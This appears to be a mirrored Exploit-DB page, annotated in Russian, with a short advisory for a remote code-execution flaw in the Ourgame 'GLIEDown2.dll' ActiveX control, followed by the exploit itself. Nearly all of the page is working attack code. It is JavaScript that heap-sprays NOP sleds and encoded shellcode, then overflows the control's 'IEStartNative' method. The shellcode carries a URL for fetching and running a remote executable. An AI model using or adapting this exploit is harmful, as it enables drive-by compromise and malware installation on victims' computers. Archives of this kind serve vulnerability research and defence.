- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 31769
- Проверка EDB
-
- Пройдено
- Автор
- ANONYMOUS
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- null
- Дата публикации
- 2008-05-08
HTML:
source: https://www.securityfocus.com/bid/29118/info
Ourgame 'GLIEDown2.dll' ActiveX control is prone to a remote code-execution vulnerability because it fails to sufficiently verify user-supplied input.
An attacker can exploit this issue to run arbitrary attacker-supplied code in the context of the currently logged-in user. Failed exploits attempts will trigger denial-of-service conditions.
Note that GlobalLink 2.8.1.2 beta is also affected by this issue.
<script> document.writeln("<html>"); document.writeln("<object classid=\"clsid:F917534D-535B-416B-8E8F-0C04756C31A8\" id=\'target\'><\/object>"); document.writeln("<body>"); document.writeln("<SCRIPT language=\"JavaScript\">"); document.writeln("var cikeqq575562708 = \"%u9090%u6090\" +"); document.writeln("\"%u17eb%u645e%u30a1%u0000\" +"); document.writeln("\"%u0500%u0800%u0000%uf88b%u00b9%u0004%uf300%uffa4%ue8e0\" +"); document.writeln("\"%uffe4%uffff%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad\" +"); document.writeln("\"%u0870%uec81%u0200%u0000%uec8b%ue8bb%u020f%u8b00%u8503\" +"); document.writeln("\"%u0fc0%ubb85%u0000%uff00%ue903%u0221%u0000%u895b%u205d\" +"); document.writeln("\"%u6856%ufe98%u0e8a%ub1e8%u0000%u8900%u0c45%u6856%u4e8e\" +"); document.writeln("\"%uec0e%ua3e8%u0000%u8900%u0445%u6856%u79c1%ub8e5%u95e8\" +"); document.writeln("\"%u0000%u8900%u1c45%u6856%uc61b%u7946%u87e8%u0000%u8900\" +"); document.writeln("\"%u1045%u6856%ufcaa%u7c0d%u79e8%u0000%u8900%u0845%u6856\" +"); document.writeln("\"%u84e7%ub469%u6be8%u0000%u8900%u1445%ue0bb%u020f%u8900\" +"); document.writeln("\"%u3303%uc7f6%u2845%u5255%u4d4c%u45c7%u4f2c%u004e%u8d00\" +"); document.writeln("\"%u285d%uff53%u0455%u6850%u1a36%u702f%u3fe8%u0000%u8900\" +"); document.writeln("\"%u2445%u7f6a%u5d8d%u5328%u55ff%uc71c%u0544%u5c28%u652e\" +"); document.writeln("\"%uc778%u0544%u652c%u0000%u5600%u8d56%u287d%uff57%u2075\" +"); document.writeln("\"%uff56%u2455%u5756%u55ff%ue80c%u0062%u0000%uc481%u0200\" +"); document.writeln("\"%u0000%u3361%uc2c0%u0004%u8b55%u51ec%u8b53%u087d%u5d8b\" +"); document.writeln("\"%u560c%u738b%u8b3c%u1e74%u0378%u56f3%u768b%u0320%u33f3\" +"); document.writeln("\"%u49c9%uad41%uc303%u3356%u0ff6%u10be%uf23a%u0874%ucec1\" +"); document.writeln("\"%u030d%u40f2%uf1eb%ufe3b%u755e%u5ae5%ueb8b%u5a8b%u0324\" +"); document.writeln("\"%u66dd%u0c8b%u8b4b%u1c5a%udd03%u048b%u038b%u5ec5%u595b\" +"); document.writeln("\"%uc25d%u0008%u92e9%u0000%u5e00%u80bf%u020c%ub900%u0100\" +"); document.writeln("\"%u0000%ua4f3%uec81%u0100%u0000%ufc8b%uc783%uc710%u6e07\" +"); document.writeln("\"%u6474%uc76c%u0447%u006c%u0000%uff57%u0455%u4589%uc724\" +"); document.writeln("\"%u5207%u6c74%uc741%u0447%u6c6c%u636f%u47c7%u6108%u6574\" +"); document.writeln("\"%uc748%u0c47%u6165%u0070%u5057%u55ff%u8b08%ub8f0%u0fe4\" +"); document.writeln("\"%u0002%u3089%u07c7%u736d%u6376%u47c7%u7204%u0074%u5700\" +"); document.writeln("\"%u55ff%u8b04%u3c48%u8c8b%u8008%u0000%u3900%u0834%u0474\" +"); document.writeln("\"%uf9e2%u12eb%u348d%u5508%u406a%u046a%uff56%u1055%u06c7\" +"); document.writeln("\"%u0c80%u0002%uc481%u0100%u0000%ue8c3%uff69%uffff%u048b\" +"); document.writeln("\"%u5324%u5251%u5756%uecb9%u020f%u8b00%u8519%u75db%u3350\" +"); document.writeln("\"%u33c9%u83db%u06e8%ub70f%u8118%ufffb%u0015%u7500%u833e\" +"); document.writeln("\"%u06e8%ub70f%u8118%ufffb%u0035%u7500%u8330%u02e8%ub70f\" +"); document.writeln("\"%u8318%u6afb%u2575%uc083%u8b04%ub830%u0fe0%u0002%u0068\" +"); document.writeln("\"%u0000%u6801%u1000%u0000%u006a%u10ff%u0689%u4489%u1824\" +"); document.writeln("\"%uecb9%u020f%uff00%u5f01%u5a5e%u5b59%ue4b8%u020f%uff00\" +"); document.writeln("\"%ue820%ufdda%uffff\" +"); document.writeln("\"%u7468%u7074%u2f3a%u772f%u7777%u622e%u6961%u7564%u6f75%u632e%u2f6e%u3231%u2f33%u6b6f%u652e%u6578\";"); document.writeln("var shellcode = unescape(cikeqq575562708);"); document.writeln("var nop = \"tmp9090tmp9090\";"); document.writeln("var Cike = unescape(nop.replace(\/tmp\/g,\"%u\"));"); document.writeln("while (Cike.length<224) Cike+=Cike;"); document.writeln("fillvcbcv = Cike.substring(0, 224);"); document.writeln("vcbcv = Cike.substring(0, Cike.length-224);"); document.writeln("while(vcbcv.length+224<0x40000) vcbcv = vcbcv+vcbcv+fillvcbcv;"); document.writeln("gdfgdh = new Array();"); document.writeln("for (x=0; x<300; x++) gdfgdh[x] = vcbcv +shellcode;"); document.writeln("var hellohack = \'\';"); document.writeln("while (hellohack.length < 600) hellohack+=\'\\x0a\\x0a\\x0a\\x0a\';"); document.writeln("target[\"\\x49\\x45\\x53\\x74\\x61\\x72\\x74\\x4e\\x61\\x74\\x69\\x76\\x65\"](hellohack,\"CikeVipWm\",\"fuckyou\");"); document.writeln("<\/script>"); document.writeln("<\/body>"); document.writeln("<\/html>"); document.writeln("") </script>
- Источник
- www.exploit-db.com